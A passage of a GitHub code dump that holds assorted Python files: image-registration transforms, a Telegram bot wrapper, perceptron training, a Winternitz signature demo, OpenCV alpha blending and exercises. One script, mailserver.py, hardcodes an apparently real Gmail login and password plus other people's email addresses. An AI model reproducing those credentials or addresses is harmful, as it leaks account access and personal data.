: array-like, shape (n_points, n_dimensions)\n :math:`w = D_x^T\\phi(x) \\cdot w`\n\n where :math:`D_x\\phi(x)` is the Jacobian of :math:`\\phi(x)`\n with respect to the spatial position :math:`x`\n \"\"\"\n\n jacobians = self.jacobian_position(points)\n res = vectorized_dot_product(jacobians, vectors[..., None])[..., 0]\n return numpy.atleast_2d(res)\n\n def transform_tensors(self, points, tensors):\n r\"\"\"Transform a set of tensors located in space.\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the vectors to be transformed\n\n T : array-like, shape (n_points, n_dimensions, n_dimensions)\n Tensors to be transformed\n\n Returns\n -------\n S : array-like, shape (n_points, n_dimensions)\n :math:`S = D^T_x\\phi(x) \\cdot T \\cdot D_x\\phi(x)`\n\n where :math:`D_x\\phi(x)` 
is the Jacobian of :math:`\\phi(x)`\n with respect to the spatial position :math:`x`\n \"\"\"\n jacobians = self.jacobian_position(points)\n return vectorized_dot_product(\n vectorized_dot_product(jacobians.swapaxes(-1, -2), tensors),\n jacobians\n )\n\n def jacobian(self, points):\n r\"\"\"Transposed Jacobian of the transform with respect to its parameters\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the Jacobian to be calculated\n\n Returns\n -------\n J : array-like, shape (n_points, n_parameters, n_dimensions)\n :math:`J = D^T_\\theta\\phi(x)`\n \"\"\"\n\n raise NotImplementedError()\n\n def jacobian_position(self, points):\n r\"\"\"Transposed Jacobian of the transform with respect to its location\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the Jacobian to be calculated\n\n Returns\n -------\n J : array-like, shape (n_points, n_dimensions, n_dimensions)\n :math:`J = D^T_x\\phi(x)`\n \"\"\"\n\n raise NotImplementedError()\n\n def jacobian_parameter_jacobian_position(self, points):\n r\"\"\"Iterated Transposed Jacobian of the transform with respect to\n its parameter and Location\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the Jacobian to be calculated\n\n Returns\n -------\n J : array-like, shape (n_points, n_parameters, n_dimensions, n_dimensions)\n :math:`J_{ijk} = \\frac{\\partial \\phi_k(x)}{\\partial \\theta_i \\partial x_j}`\n \"\"\"\n raise NotImplementedError()\n\n def jacobian_vector_matrices(self, points, vectors):\n r\"\"\"Transposed Jacobian with respect to the transform parameter\n of the expression :math:`D^T_x \\phi(x) \\cdot v`\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the Jacobian to be calculated\n\n v : array-like, shape (n_points, n_dimensions)\n Vectors at each point of x\n\n\n Returns\n -------\n J : array-like, shape (n_points, n_parameters, n_dimensions, n_dimensions)\n :math:`J = D^T_\\theta[D^T_x\\phi(x) \\cdot v]`\n \"\"\"\n jacobian_parameter_jacobian_position = self.jacobian_parameter_jacobian_position(points)\n\n DjacT_vector = vectorized_dot_product(\n jacobian_parameter_jacobian_position, # .swapaxes(-1, -2),\n vectors[:, None, :, None]\n )[:, :, :, 0]\n\n return DjacT_vector\n\n def jacobian_tensor_matrices(self, points, tensors):\n r\"\"\"Transposed Jacobian with respect to the transform parameter\n of the expression :math:`D_x^T \\phi(x) \\cdot T \\cdot D_x\\phi(x)`\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the Jacobian to be calculated\n\n T : array-like, shape (n_points, n_dimensions, n_dimensions)\n Tensors at each point of x\n\n\n Returns\n -------\n J : array-like, shape (n_points, n_parameters, n_dimensions, n_dimensions)\n :math:`J = D^T_\\theta[D^T_x\\phi(x) \\cdot T\\cdot D_x\\phi(x)]`\n \"\"\"\n jacobians = self.jacobian_position(points)\n jacobian_parameter_jacobian_position = self.jacobian_parameter_jacobian_position(points)\n\n tensor_jac = vectorized_dot_product(tensors, jacobians)\n DjacT_tensor_jac = vectorized_dot_product(\n jacobian_parameter_jacobian_position.swapaxes(-1, -2),\n tensor_jac[:, None, :, :]\n )\n\n return DjacT_tensor_jac + DjacT_tensor_jac.swapaxes(-1, -2)\n\n def norm(self, points):\n raise NotImplementedError()\n\n @property\n def bounds(self):\n r\"\"\"\n Stores the upper and lower bounds for each component of the parameter vectors\n :math:`\\theta` such that 
:math:`\\text{bounds}_{i0} \\leq \\theta_i \\leq \\text{bounds}_{i1}`\n \"\"\"\n return None\n","repo_name":"demianw/pyMedImReg-public","sub_path":"registration/model/basis.py","file_name":"basis.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25824939473","text":"import collections.abc\nimport logging\nfrom typing import Iterable, Union\n\nimport aiogram # type: ignore\n\nfrom . import types, share, exceptions\n\nResponseType = Union[types.Response, Iterable[types.Response]]\n\n\nclass BotWrapper:\n def __init__(self, bot: aiogram.Bot, share_: share.Share):\n self._bot = bot\n self._share = share_\n\n async def _send_one(self, chat_id: int, resp: types.Response):\n photo_bytes = None\n if resp.photo_path:\n try:\n photo_bytes = self._share.get_file(resp.photo_path)\n except exceptions.ResourceNotFound:\n logging.error(\n 'Resource not found: %s, falling back to plain text',\n resp.photo_path,\n )\n\n if photo_bytes:\n await self._bot.send_photo(\n chat_id, photo_bytes, resp.text, resp.parse_mode,\n )\n else:\n await self._bot.send_message(chat_id, resp.text, resp.parse_mode)\n\n async def send(self, chat_id: int, response: ResponseType):\n if isinstance(response, collections.abc.Iterable):\n for msg in response:\n await self._send_one(chat_id, msg)\n else:\n await self._send_one(chat_id, response)\n\n async def reply(self, message: aiogram.types.Message, resp: ResponseType):\n await self.send(message.chat.id, resp)\n","repo_name":"maxkimlyk/birthdays-lord-bot","sub_path":"bot/bot_wrapper.py","file_name":"bot_wrapper.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7025748174","text":"import numpy as np\n\n\ndef num_correct(w, b):\n count = 0\n for m in data:\n xm = m[0:4]\n y = m[4]\n count += 1 if y * (np.dot(w, xm) + b) > 0 else 0\n return count\n\n\ndef standard_gradient_descent(w, b, gamma):\n for t in range(0, 10000000):\n deltaw = 0\n deltab = 0\n correct = 0\n for m in data:\n xm = m[0:4]\n y = m[4]\n discriminator = (1 - y * (np.dot(w, xm) + b))\n gradw = 2 * y * xm * discriminator\n gradb = 2 * y * discriminator\n deltaw += gradw if discriminator >= 0 else 0\n deltab += gradb if discriminator >= 0 else 0\n correct += 1 if y * (np.dot(w, xm) + b) > 0 else 0\n w = w + deltaw*gamma/data.shape[0]\n b = b + deltab*gamma/data.shape[0]\n if correct == data.shape[0]:\n return [w, b]\n\n\ndef stochastic_gradient_descent(w, b, gamma):\n for t in range(0, 10000000):\n deltaw = 0\n deltab = 0\n k = data[t % data.shape[0]]\n xk = k[0:4]\n y = k[4]\n discriminator = (1 - y * (np.dot(w, xk) + b))\n gradw = 2 * y * xk * discriminator\n gradb = 2 * y * discriminator\n deltaw += gradw if discriminator >= 0 else 0\n deltab += gradb if discriminator >= 0 else 0\n\n w = w + deltaw*gamma/data.shape[0]\n b = b + deltab*gamma/data.shape[0]\n if t % data.shape[0] == 0:\n correct = num_correct(w, b)\n if correct == data.shape[0]:\n return [t, w, b]\n\n\ndata = np.loadtxt(\"perceptron.data\", delimiter=\",\")\n# standard_parameters = standard_gradient_descent(w=np.array([0, 0, 0, 0]), b=0, gamma=1)\nstochastic_parameters = stochastic_gradient_descent(w=np.array([0, 0, 0, 0]), b=0, 
gamma=1)\nprint(stochastic_parameters)\n\n","repo_name":"austin5627/Machine-Learning-HW","sub_path":"HW1/Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"30339717116","text":"import unittest\n\n\ndef get_permutations(string):\n    if len(string) == 0 or len(string) == 1:\n        return set([string])\n\n    char = string[-1]\n    sub_str = string[:-1]\n    sub_perms = get_permutations(sub_str)\n\n    perms = []\n    for perm in sub_perms:\n        for i in range(len(perm)+1):\n            perms.append(perm[:i] + char + perm[i:])\n\n    return set(perms)\n\n\n# Tests\n\nclass Test(unittest.TestCase):\n\n    def test_empty_string(self):\n        actual = get_permutations('')\n        expected = set([''])\n        self.assertEqual(actual, expected)\n\n    def test_one_character_string(self):\n        actual = get_permutations('a')\n        expected = set(['a'])\n        self.assertEqual(actual, expected)\n\n    def test_two_character_string(self):\n        actual = get_permutations('ab')\n        expected = set(['ab', 'ba'])\n        self.assertEqual(actual, expected)\n\n    def test_three_character_string(self):\n        actual = get_permutations('abc')\n        expected = set(['abc', 'acb', 'bac', 'bca', 'cab', 'cba'])\n        self.assertEqual(actual, expected)\n\n\nunittest.main(verbosity=2)\n","repo_name":"dm36/interview-practice","sub_path":"interview_cake_daily_practice/perms.py","file_name":"perms.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} {"seq_id":"2992308370","text":"\nimport smtplib as s\nob=s.SMTP(\"smtp.gmail.com\",587)\n\nob.starttls()\n\nob.login(\"nsinghboss02@gmail.com\", \"9795357222\")\n\nsubject=\"sending email using python\"\nbody=\"the easiest way to send emails\"\n\nmessage=\"subject:{}\\n\\n{}\".format(subject,body)\nlistOfAddress=[\"singhalokkumar427@gmail.com\",\"nitishtiwari1710@gmail.com\",\"nitin.singh_cs20@gla.ac.in\"]\nob.sendmail(\"nsinghboss02@gmail.com\",listOfAddress,message)\nprint(\"sent successfully.....\")\nob.quit()\n","repo_name":"being-nitin/sending-email-using-python","sub_path":"mailserver.py","file_name":"mailserver.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} {"seq_id":"10378652814","text":"# Data analysis in a tuple #\r\nn1 = int(input('Digite um número: '))\r\nn2 = int(input('Digite mais um número: '))\r\nn3 = int(input('Digite outro número: '))\r\nn4 = int(input('Digite um ultimo número: '))\r\n\r\nnum = (n1, n2, n3, n4)\r\n\r\n\r\nprint(f'Você digitou esses valores: {num}')\r\nprint(f'O valor 9 apareceu {num.count(9)} vezes.')\r\nif 3 in num:\r\n    print(\r\n        f'O valor 3 apareceu pela primeira vez na {num.index(3)+1}ª posição.')\r\nelse:\r\n    print('O valor 3 não apareceu na tupla')\r\nprint(f'Os valores pares digitados foram: ', end=' ')\r\nfor par in num:\r\n    if par % 2 == 0:\r\n        print(par, end=' ')\r\n","repo_name":"BrunoMorastoni/DesafiosCursoEmVideo-PyMundo03","sub_path":"Desafios/Desafio 75.py","file_name":"Desafio 75.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"39387895351","text":"#Write a Python function called find_longest_palindrome that takes a string as input and returns the longest palindromic substring in the string.\n\n#A palindromic string is a string that is spelled the same forwards and backwards, e.g. \"racecar\".\n
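#Example: for s = \"banana\" the longest palindromic substring is \"anana\"\n#(length 5); the expand-around-centre helpers below try both odd and even\n#centres, giving O(n^2) worst-case time.\n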
#A substring is a contiguous sequence of characters within a string.\n\n\nfrom typing import List\n\ndef find_longest_palindrome(string):\n    # Edge case: empty input\n    if not string:\n        return \"\"\n\n    # Initialize the longest palindrome to the first character\n    longest_palindrome = string[0]\n\n    # Iterate through each character in the string\n    for i in range(len(string)):\n        # Check for palindromes of odd length centered at this character\n        palindrome = find_palindrome(string, i, i)\n        if len(palindrome) > len(longest_palindrome):\n            longest_palindrome = palindrome\n\n        # Check for palindromes of even length centered at this character\n        palindrome = find_palindrome(string, i, i+1)\n        if len(palindrome) > len(longest_palindrome):\n            longest_palindrome = palindrome\n\n    return longest_palindrome\n\ndef find_palindrome(string, left, right):\n    # Continue expanding the palindrome as long as the left and right indices are valid\n    # and the characters at those indices are the same\n    while left >= 0 and right < len(string) and string[left] == string[right]:\n        left -= 1\n        right += 1\n\n    # Return the palindrome, excluding the characters that caused the loop to exit\n    return string[left+1:right]\n\n\ns = \"banana\"\n\nprint(find_longest_palindrome(s))","repo_name":"IchibanKanobee/MyExperimentalProjects","sub_path":"Interview/Python/leetcode/find_longest_palindrom.py","file_name":"find_longest_palindrom.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"5593936365","text":"import torch\nfrom visdom import Visdom\n\n\nclass My_Visdom():\n    def __init__(self, port, env_name = 'main'):\n        super(My_Visdom, self).__init__()\n        self.visdom = Visdom(port = port)\n        self.record_Y = {}\n        self.record_X = {}\n        self.env_name = env_name\n\n    def plot_record(self, Y_value, win_name, X_value = None):\n        if (isinstance(Y_value, torch.Tensor)):\n            Y_value = Y_value.item()\n        assert isinstance(Y_value, int) or isinstance(Y_value, float)\n        if (win_name not in self.record_Y):\n            self.record_Y[win_name] = []\n            self.record_X[win_name] = []\n        self.record_Y[win_name].append(Y_value)\n        if (X_value is None):\n            if (len(self.record_X[win_name]) == 0):\n                self.record_X[win_name].append(1)\n            else:\n                self.record_X[win_name].append(self.record_X[win_name][-1] + 1)\n        else:\n            self.record_X[win_name].append(X_value)\n        self.visdom.line(Y = self.record_Y[win_name], X = self.record_X[win_name], win = win_name,\n                         opts = dict(title = win_name), env = self.env_name)\n\n    def text(self, text, win_name, append):\n        if (append):\n            if (self.visdom.win_exists(win = win_name, env = self.env_name)):\n                self.visdom.text(text = text, win = win_name, append = True, env = self.env_name,\n                                 opts = dict(title = win_name))\n            else:\n                self.visdom.text(text = text, win = win_name, append = False, env = self.env_name,\n                                 opts = dict(title = win_name))\n        else:\n            self.visdom.text(text = text, win = win_name, append = False, opts = dict(title = win_name),\n                             env = self.env_name)\n\n    def table(self, tbl, win_name):\n        tbl_str = \"<table width=\\\"100%\\\"> \"\n        tbl_str += \"<tr> \\\n                   <th>Term</th> \\\n                   <th>Value</th> \\\n                   </tr>\"\n        for k, v in tbl.items():\n            tbl_str += \"<tr> \\\n                       <td>%s</td> \\\n                       <td>%s</td> \\\n                       </tr>\" % (k, v)\n\n        tbl_str += \"</table>\"\n        default_opts = {'title': win_name}\n        self.visdom.text(text = tbl_str, win = win_name, append = False, env = self.env_name, opts = default_opts)\n\n    def clear_record(self, win_name):\n        if (win_name in self.record_Y):\n            self.record_Y[win_name] = []\n            self.record_X[win_name] = []\n        else:\n            raise Exception('win name not in env')\n\n    def close_all_curves(self):\n        self.visdom.close(win = None, env = self.env_name)\n\n\nif __name__ == '__main__':\n    visdom = My_Visdom(env_name = 'main', port = 8888)\n    visdom.plot_record(Y_value = 1, win_name = 'hello', X_value = 1)\n    visdom.plot_record(Y_value = 10, win_name = 'hello', X_value = 2)\n\n    # import time\n    # time.sleep(0.1)\n    # visdom.close_all_curves()\n    visdom.text('hello, world,123', 'text 123', True)\n    # visdom.text('hello, world,234', 'text 123', True)\n","repo_name":"zhanglu-cst/ClassKG","sub_path":"compent/visdom_show.py","file_name":"visdom_show.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"34"} {"seq_id":"18646168837","text":"name = \"Roshan\"\r\nage = 22\r\nprint(\"Hello \" + name + \" Your age is \" + str(age) ) #ugly syntax\r\n\r\n#String formatting\r\n#1.using placeholder {} ----(python 3)\r\n\r\nprint(\"Hello {} your age is {}\".format(name , age+3))\r\n\r\n#2.using f-strings ----> Python 3.6\r\n\r\nprint(f\"Hello {name} your age is {age+2}\") #string formatting\r\n\r\n#average of 3 numbers\r\na ,b , c = input(\"Enter 3 numbers separated by commas\").split(\",\")\r\n# a,b,c = int(input(\"Enter 3 numbers separated by commas\").split(\",\"))# type error\r\n#we can't cast the whole split list with a single int() call\r\na = int(a)\r\nb = int(b)\r\nc = int(c)\r\nprint(f\"The avg is {(a+b+c)/3}\")","repo_name":"rksharma333/pythonRepo","sub_path":"pythonHarshitVasistha/Chapter 2 All about String/4 string formatting.py","file_name":"4 string formatting.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"26946809357","text":"import jax\nimport jax.numpy as np\nimport ipdb\n\nfrom functools import partial\n\nfrom equinox import filter_jit\n\n\n# filter_jit from equinox is really cool. it will treat jax arrays dynamically (so jit\n# only re-runs when they have new shape), whereas other types (ints, bools, strings, ...)\n# will trigger re-jitting when changed, as if they were marked as static_argnums/names in\n# jax.jit.\n\n# this allows us to have jax arrays in algo_params without too much hassle.\n\n@filter_jit\ndef resample(ys, t, nn_apply_fct, nn_params, algo_params, key):\n\n    # all the ys that have left the interesting region, we want to put back into it.\n\n    # this is the first mockup of the 'actual' resampling function.\n    # It will not only put points in new locations, but also put in the correct value\n    # and costate information, based on the value function approximation given by\n    # (nn_apply_fct, nn_params). nn_apply_fct should be the apply function of the nn\n    # object itself, NOT the wrapper which is mostly used here. This is to separate\n    # NN architecture info (-> in nn object) from the parameters nn_params, which\n    # otherwise would have been in the same nn_wrapper object, preventing jit.\n\n    # variable naming scheme:\n    # old       : before resampling, whatever came out of the last pontryagin integration step\n    # resampled : ALL resampled variables, whether we want them or not\n    # new       : resampled where we want to resample, old where we don't\n\n\n    # does this work with jit? 
-> yes, apparently\n nx = (ys.shape[1] - 1) // 2\n\n old_xs = ys[:, 0:nx]\n old_V_grads = ys[:, nx:2*nx]\n old_Vs = ys[:, -1]\n\n\n # depending on the resampling condition, set the resampling mask to 1 for the trajectories\n # we want to resample.\n if algo_params['resample_type'] == 'minimal':\n\n # x domain is parameterised as ellipse: X = {x in R^n: x.T @ Q_x @ x <= 1}\n ellipse_membership_fct = lambda x: x.T @ algo_params['x_domain'] @ x - 1\n ellipse_memberships = jax.vmap(ellipse_membership_fct)(old_xs)\n\n resample_mask = (ellipse_memberships > 0).astype(np.float32)\n\n elif algo_params['resample_type'] == 'all':\n\n resample_mask = np.ones((algo_params['n_trajectories']))\n\n else:\n # use the same key as above -- 'resampling_type' was a typo that raised KeyError instead of RuntimeError\n raise RuntimeError(f'Invalid resampling type \"{algo_params[\"resample_type\"]}\"')\n\n\n # just resample ALL the xs anyway, and later let the mask decide which to keep.\n # resampled_xs = scale @ jax.random.normal(key, (algo_params['n_trajectories'], nx, 1))\n resampled_xs = jax.random.multivariate_normal(\n key,\n mean=np.zeros(nx,),\n cov=algo_params['x_sample_cov'],\n shape=(algo_params['n_trajectories'],)\n )\n\n\n # add extra dimension to resampling mask for broadcasting\n new_xs = np.where(resample_mask[:, None], resampled_xs, old_xs)\n\n # every trajectory is at the same time...\n ts = t * np.ones((algo_params['n_trajectories'], 1))\n\n # input vector of the NN\n # squeeze removes the last 1. (n_traj, nx, 1) -> (n_traj, nx).\n # because the NN doesn't work with explicit (n, 1) shaped column vectors\n resampled_ts_and_xs = np.concatenate([ts, resampled_xs], axis=1)\n\n # these value gradients are with respect to (t, x). so we also have time\n # gradients, not only the ones w.r.t. state. can we do something with those as well?\n\n # we have d/dt V(t, x(t)) = V_t(t, x(t)) + V_x(t, x(t)).T d/dt x(t)\n # or d/dt V(t, x(t)) = [V_t(t, x(t)) V_x(t, x(t))] @ [1 d/dt x(t)]\n # this is basically a linear system which (probably?) we can solve for\n # V_t(t, x(t)) (partial derivative in first argument, not total time derivative)\n # so, TODO, also try to incorporate time gradient during training.\n\n # do some jax magic\n V_fct = lambda z: nn_apply_fct(nn_params, z).reshape()\n V_fct_and_grad = jax.value_and_grad(V_fct)\n V_fct_and_grad_batch = jax.vmap(V_fct_and_grad)\n\n resampled_Vs, resampled_V_grads = V_fct_and_grad_batch(resampled_ts_and_xs)\n\n # weird [None] tricks so it doesn't do any wrong broadcasting\n # V grads [1:] because the NN output also is w.r.t. 
t which at the moment we don't need\n new_Vs = np.where(resample_mask , resampled_Vs , old_Vs)\n new_V_grads = np.where(resample_mask[:, None], resampled_V_grads[:, 1:], old_V_grads)\n\n # circumventing jax's immutable objects.\n # if docs are to be believed, after jit this will do an efficient in place update.\n ys = ys.at[:, 0:nx].set(new_xs)\n ys = ys.at[:, nx:2*nx].set(new_V_grads)\n ys = ys.at[:, -1].set(new_Vs)\n\n return ys, resample_mask\n\n\n\n\ndef sol_array_to_train_data(all_sols, all_ts, resampling_i, n_timesteps, algo_params):\n\n # basically, this takes the data in all_sols and all_ts, slices out the\n # relevant part between the current resampling (resampling_i) and the\n # lookback horizon, and reshapes it accordingly so the NN can handle it.\n\n # training data terminology:\n\n # input = [t, state], label = V\n\n # reshape - during training we do not care which is the time and which the\n # trajectory index, they are all just pairs of ((t, x), V) regardless\n\n # before we have a shape (n_traj, n_time, 2*nx+1, 1).\n # here we remove the last dimension - somehow it makes NN stuff easier.\n\n nx = (all_sols.shape[2]-1) // 2\n\n if algo_params['nn_train_lookback'] == np.inf:\n # use ALL the training data available\n train_time_idx = np.arange(resampling_i, n_timesteps)\n else:\n lookback_indices = int(algo_params['nn_train_lookback'] / algo_params['dt'])\n upper_train_time_idx = resampling_i + lookback_indices\n if upper_train_time_idx > n_timesteps:\n # If available data <= lookback, just use whatever we have.\n upper_train_time_idx = n_timesteps\n\n train_time_idx = np.arange(resampling_i, upper_train_time_idx)\n\n train_states = all_sols[:, train_time_idx, 0:nx].reshape(-1, nx)\n\n # make new axes to match train_state\n train_ts = all_ts[None, train_time_idx]\n # repeat for all trajectories (axis 0), which all have the same ts.\n train_ts = np.repeat(train_ts, algo_params['n_trajectories'], axis=0)\n # flatten the same way as train_states\n train_ts = train_ts.reshape(-1, 1)\n\n # assemble into main data arrays\n # these are of shape (n_datpts, n_inputfeatures) and (n_datapts, 1)\n train_inputs = np.concatenate([train_ts, train_states], axis=1)\n\n if algo_params['nn_V_gradient_penalty'] == 0:\n train_labels = all_sols[:, train_time_idx, 2*nx].reshape(-1, 1)\n else:\n assert algo_params['nn_V_gradient_penalty'] > 0, 'V gradient penalty must be nonnegative'\n\n # if this penalty is > 0, we also want the value gradient (= costate) to be in the\n # labels, which becomes vector-valued. 
in the NN code we then add a loss term penalising\n # gradient error, something like || grad_x V_nn (x) - λ(x) ||^2\n\n # we want from the extended state, in this order:\n # - the costate at indices nx:2*nx\n # - the value at index 2*nx, which is the last one\n train_labels = all_sols[:, train_time_idx, nx:].reshape(-1, 1 + nx)\n\n\n return train_inputs, train_labels\n\n","repo_name":"mbjd/approximate_optimal_control","sub_path":"array_juggling.py","file_name":"array_juggling.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35337575713","text":"__author__ = 'Shahrukh khan'\r\n\r\n\"\"\" \r\nTransparent Image overlay(Alpha blending) with OpenCV and Python\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\n# function to overlay a transparent image on background.\r\ndef transparentOverlay(src , overlay , pos=(0,0),scale = 1):\r\n \"\"\"\r\n :param src: Input Color Background Image\r\n :param overlay: transparent Image (BGRA)\r\n :param pos: position where the image to be blit.\r\n :param scale : scale factor of transparent image.\r\n :return: Resultant Image\r\n \"\"\"\r\n overlay = cv2.resize(overlay,(0,0),fx=scale,fy=scale)\r\n h,w,_ = overlay.shape # Size of pngImg\r\n rows,cols,_ = src.shape # Size of background Image\r\n y,x = pos[0],pos[1] # Position of PngImage\r\n \r\n #loop over all pixels and apply the blending equation\r\n for i in range(h):\r\n for j in range(w):\r\n if x+i >= rows or y+j >= cols:\r\n continue\r\n alpha = float(overlay[i][j][3]/255.0) # read the alpha channel \r\n src[x+i][y+j] = alpha*overlay[i][j][:3]+(1-alpha)*src[x+i][y+j]\r\n return src\r\n\r\n\"\"\" ----------- Read all images --------------------\"\"\"\r\nbImg = cv2.imread(\"background.jpg\")\r\n\r\n# KeyPoint : Remember to use cv2.IMREAD_UNCHANGED flag to load the image with alpha channel\r\npngImage = cv2.imread(\"foreground.png\" , cv2.IMREAD_UNCHANGED)\r\nlogoImage = cv2.imread(\"logo.png\",cv2.IMREAD_UNCHANGED)\r\n\r\n# Overlay transparent images at desired position(x,y) and Scale. 
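\r\n# NOTE (illustrative sketch added for clarity, not part of the original script): the per-pixel\r\n# Python loop in transparentOverlay above is slow on large images; the same blending equation\r\n# can be applied in one shot with NumPy broadcasting. The function name below is hypothetical.\r\ndef transparentOverlayVectorized(src, overlay, pos=(0,0), scale=1):\r\n overlay = cv2.resize(overlay, (0,0), fx=scale, fy=scale)\r\n h, w, _ = overlay.shape\r\n rows, cols, _ = src.shape\r\n y, x = pos[0], pos[1]\r\n h, w = min(h, rows - x), min(w, cols - y) # clip the overlay so it stays inside the background\r\n alpha = overlay[:h, :w, 3:4] / 255.0 # (h, w, 1) alpha channel, broadcast over the BGR channels\r\n src[x:x+h, y:y+w] = alpha * overlay[:h, :w, :3] + (1 - alpha) * src[x:x+h, y:y+w]\r\n return src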
\r\nresult = transparentOverlay(bImg,pngImage,(300,0),0.7)\r\nresult = transparentOverlay(bImg,logoImage,(800,400),2)\r\n\r\n#Display the result \r\ncv2.namedWindow(\"Result\",cv2.WINDOW_NORMAL)\r\ncv2.imshow(\"Result\" ,result)\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n","repo_name":"sk1210/Alpha-Blending","sub_path":"source/alpha_blend.py","file_name":"alpha_blend.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"25133208796","text":"'''Example implementation of Winternitz one-time signature scheme'''\r\n\r\nimport hashlib\r\nimport secrets\r\n\r\ndef fromBytesToBinary(bytes: bytes) -> list[str]:\r\n '''Converts bytes to list of 8bit binary strings.'''\r\n binaryList: list[str] = []\r\n for byte in bytes:\r\n binaryList.append(bin(byte)[2:].zfill(8))\r\n return binaryList\r\n\r\n\r\ndef generateKeyPair() -> tuple[list[bytes], list[bytes]]:\r\n '''Generates (secretKey, publicKey) pair, where secretKey is secret and publicKey is public key.'''\r\n secretKey: list[bytes] = []\r\n publicKey: list[bytes] = []\r\n for i in range(32): # generates 32 random values for secret key and hashes every one of them 256 times to create public key\r\n secretKey.append(secrets.token_bytes(32))\r\n publicKeyElement = hashlib.sha256(secretKey[i]).digest()\r\n for j in range(1, 256):\r\n publicKeyElement = hashlib.sha256(publicKeyElement).digest()\r\n publicKey.append(publicKeyElement)\r\n return (secretKey, publicKey)\r\n\r\ndef sign(message: str, secretKey: list[bytes]) -> list[bytes]:\r\n '''Generates signature for the message.'''\r\n signature: list[bytes] = []\r\n messageHash = fromBytesToBinary(hashlib.sha256(message.encode('utf-8')).digest()) # hashes the message and converts it to 8-bit binary strings\r\n for i in range(len(messageHash)): \r\n N = int(messageHash[i], 2) # converts value N (8-bit string from message hash) from binary to decimal\r\n signatureElement = hashlib.sha256(secretKey[i]).digest() \r\n for j in range(1, 256 - N): # creates the signature by hashing every element of secret key 256-N times\r\n signatureElement = hashlib.sha256(signatureElement).digest()\r\n signature.append(signatureElement)\r\n return signature\r\n\r\ndef verifySignature(signature: list[bytes], message: str, publicKey: list[bytes]) -> bool: \r\n '''Returns True if signature is compatible with public key, False otherwise.'''\r\n messageHash = fromBytesToBinary(hashlib.sha256(message.encode('utf-8')).digest())\r\n for i in range(len(signature)):\r\n N = int(messageHash[i], 2)\r\n signatureElement = hashlib.sha256(signature[i]).digest()\r\n for j in range(1, N): # hashes every element in signature another N times and compares it with corresponding value in public key\r\n signatureElement = hashlib.sha256(signatureElement).digest()\r\n if signatureElement != publicKey[i]:\r\n return False\r\n return True\r\n\r\nif __name__ == \"__main__\":\r\n keypair = generateKeyPair()\r\n message = \"This is message\"\r\n signature = sign(message, keypair[0])\r\n print(f\"Signature verification: {verifySignature(signature, message, keypair[1])}\")","repo_name":"shionorix/krypto-projekt","sub_path":"winternitzSignature.py","file_name":"winternitzSignature.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22151518644","text":"# 497. 
Random Point in Non-overlapping Rectangles\n# Given an array rects of non-overlapping axis-aligned rectangles, where rects[i] = [ai, bi, xi, yi] indicates that (ai, bi) is the bottom-left corner point of the i-th rectangle and (xi, yi) is its top-right corner point, design an algorithm to randomly pick an integer point covered by one of the rectangles. Points on the perimeter of a rectangle also count as covered. All qualifying points must be returned with equal probability.\n\n# Any integer point within the space covered by the given rectangles may be returned.\n\n# Note that an integer point is a point with integer coordinates.\n\n# Implement the Solution class:\n\n# Solution(int[][] rects) initializes the object with the given array of rectangles rects.\n# int[] pick() returns a random integer point [u, v] within the space covered by the given rectangles.\n\n# Source: LeetCode (力扣)\n# Link: https://leetcode.cn/problems/random-point-in-non-overlapping-rectangles\n# Copyright belongs to LeetCode China (领扣网络). Commercial reuse requires official authorization; non-commercial reuse must cite the source.\n\nfrom bisect import bisect_left\nfrom random import randint, randrange\nfrom typing import List\n\n### Note: the prefix sum must be computed from the number of lattice points, not directly from the area.\nclass Solution:\n\n def __init__(self, rects: List[List[int]]):\n self.rects=rects\n self.preSum=[0]\n for a,b,x,y in rects:\n self.preSum.append(self.preSum[-1]+(x-a+1)*(y-b+1))\n\n\n def pick(self) -> List[int]:\n num = randint(1,self.preSum[-1])\n ind = bisect_left(self.preSum,num)\n a,b,x,y= self.rects[ind-1]\n dx = randint(0,x-a)\n dy = randint(0,y-b)\n return [a+dx,b+dy]\n\n\n\n\n# Your Solution object will be instantiated and called as such:\n# obj = Solution(rects)\n# param_1 = 